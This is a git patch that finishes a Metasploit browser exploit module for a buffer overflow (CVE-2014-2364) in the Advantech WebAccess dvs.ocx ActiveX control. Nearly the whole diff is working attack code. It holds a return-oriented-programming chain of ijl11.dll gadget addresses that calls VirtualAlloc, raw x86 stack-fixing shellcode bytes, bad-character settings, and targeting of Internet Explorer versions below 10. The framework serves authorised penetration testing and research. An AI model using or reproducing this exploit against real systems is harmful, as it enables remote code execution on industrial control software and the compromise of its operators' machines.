From 80f02c2a0597d4b5595f8b266082df96dbc5d474 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 16 Sep 2014 15:18:11 -0500 Subject: [PATCH] Make module ready to go --- .../advantech_webaccess_dvs_getcolor.rb | 149 ++++++++++-------- 1 file changed, 81 insertions(+), 68 deletions(-) diff --git a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb index 48fdef4624..aebc3071fe 100644 --- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb +++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb @@ -12,62 +12,72 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow', - 'Description' => %q{ + 'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow', + 'Description' => %q{ This module exploits a buffer overflow vulnerability in Advantec WebAccess. The vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to sprintf can be reached with user controlled data through the GetColor function. - This module has been tested successfully on Windows 7 SP1 and IE 10. + This module has been tested successfully on Windows XP SP3 with IE6 and Windows + 7 SP1 with IE8 and IE 9. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'Unknown', # Vulnerability discovery 'juan vazquez' # Metasploit module ], - 'References' => + 'References' => [ ['CVE', '2014-2364'], ['ZDI', '14-255'], ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02'] ], - 'DefaultOptions' => + 'DefaultOptions' => { - 'InitialAutoRunScript' => 'migrate -f', + 'Retries' => false, + 'InitialAutoRunScript' => 'migrate -f' }, 'BrowserRequirements' => { - :source => /script|headers/i, - :os_name => Msf::OperatingSystems::WINDOWS, - :ua_name => /MSIE/i, - :clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}", - :method => "GetColor" + :source => /script|headers/i, + :os_name => Msf::OperatingSystems::WINDOWS, + :ua_name => /MSIE/i, + :ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') }, + :clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}", + :method => "GetColor" }, - 'Payload' => + 'Payload' => { - 'Space' => 2048, - 'StackAdjustment' => -3500, - 'DisableNopes' => true, - 'BadChars' => "\x00\x0a\x0d" + 'Space' => 4096, + 'DisableNops' => true, + 'BadChars' => "\x00\x0a\x0d\x5c", + # Patch the stack to execute the decoder... + 'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100 + # Fix the stack again, this time better :), before the payload + # is executed. + 'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] + "\x83\xC0\x08" + # add eax, byte 8 + "\x8b\x20" + # mov esp, [eax] + "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 }, - 'Platform' => 'win', - 'Targets' => + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Targets' => [ [ 'Automatic', { } ] ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jul 17 2014')) + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jul 17 2014')) end def on_request_exploit(cli, request, target_info) - p "#{target_info}" print_status("Requested: #{request.uri}") content = <<-EOS EOS @@ -76,54 +86,57 @@ test.GetColor("#{sploit}", 0); send_response_html(cli, content) end - def sploit - xpl = Rex::Text.pattern_create(61) #offset - - #xpl << "BBBB" # EIP :-) - xpl << [0x60014185].pack("V") # RET - xpl << "CCCCDDDD" - #xpl << (0x01..0x09).to_a.pack("C*") # ESP - #xpl << (0x0b..0x0c).to_a.pack("C*") - #xpl << (0x0e..0xff).to_a.pack("C*") - - # EDI = ESP (ptr to esp) - xpl << [0x600180ce].pack("V") # XOR EAX,EAX # RETN - xpl << [0x6001087d].pack("V") # PUSH ESP # AND AL,10 # JNE IJL11+0X10485 (60010485) [BR=0] # POP EDI # POP ESI # POP EBP # POP EBX # POP ECX # RETN ** [ijl11.dll] ** | ascii {PAGE_EXECUTE_READ} - xpl << [0x41414141].pack("V") # esi - xpl << [0x60029f6c].pack("V") # ebp .data ijl11.dll - xpl << [0xfffffff8].pack("V") # ebx - xpl << [0xffffffff].pack("V") # ecx - - # ECX = 0 + def rop_payload(code) + xpl = rand_text_alphanumeric(61) # offset + xpl << [0x60014185].pack("V") # RET + xpl << rand_text_alphanumeric(8) + # EDX = flAllocationType (0x1000) + xpl << [0x60012288].pack("V") # POP ECX # RETN + xpl << [0xffffffff].pack("V") # ecx value + xpl << [0x6002157e].pack("V") # POP EAX # RETN + xpl << [0x9ffdbf89].pack("V") # eax value + xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN + xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 + # EBX = dwSize (0x1000) + xpl << [0x60018084].pack("V") # POP EBP # RETN + xpl << [0x41414141].pack("V") # padding + xpl << [0x41414141].pack("V") # padding + xpl << [0x41414141].pack("V") # padding + xpl << [0x41414141].pack("V") # padding + xpl << [0x60029f6c].pack("V") # .data ijl11.dll + xpl << [0x60012288].pack("V") # POP ECX # RETN + xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN) + xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret + # ECX = flProtect (0x40) xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << [0x60029f6c].pack("V") # .data ijl11.dll - xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN + xpl << [0x60012288].pack("V") # POP ECX # RETN + xpl << [0xffffffff].pack("V") # ecx value + 0x41.times do + xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN + end + # EAX = ptr to &VirtualAlloc() + xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll] + xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll] + # EBP = POP (skip 4 bytes) + xpl << [0x6002054b].pack("V") # POP EBP # RETN + xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn) + # ESI = ptr to JMP [EAX] + xpl << [0x600181cc].pack("V") # POP ESI # RETN + xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax]) + # EDI = ROP NOP (RETN) + xpl << [0x60021ad1].pack("V") # POP EDI # RETN + xpl << [0x60021ad2].pack("V") # ptr to &(retn) + # ESP = lpAddress (automatic) + # PUSHAD # RETN + xpl << [0x60018399].pack("V") # PUSHAD # RETN + xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn) + xpl << code - # eax = 0x40 - xpl << [0x600180ce].pack("V") # XOR EAX,EAX # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN + xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string + xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping - # edx = 0x40 - xpl << [0x6001f0ec].pack("V") # XOR EDX,EDX # RETN - xpl << [0x60024eb6].pack("V") # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # MUL EAX,ECX # ADD EDX,EBX # POP EBX # RETN 0x10 - xpl << [0x41414141].pack("V") - - # set VirtualAlloc stack and call! - xpl << [0x60014184].pack("V") # POP ECX # RETN - xpl << [0x41414141].pack("V") - xpl << [0x41414141].pack("V") - xpl << [0x41414141].pack("V") - xpl << [0x41414141].pack("V") - xpl << [0x60022653].pack("V") # (ecx => VirtualAlloc) (EDI ptr to address) - xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret - xpl << "A" * 1000 - - xpl.gsub("\"", "\\\"") # Escape double quote, to not break javascript string + xpl end end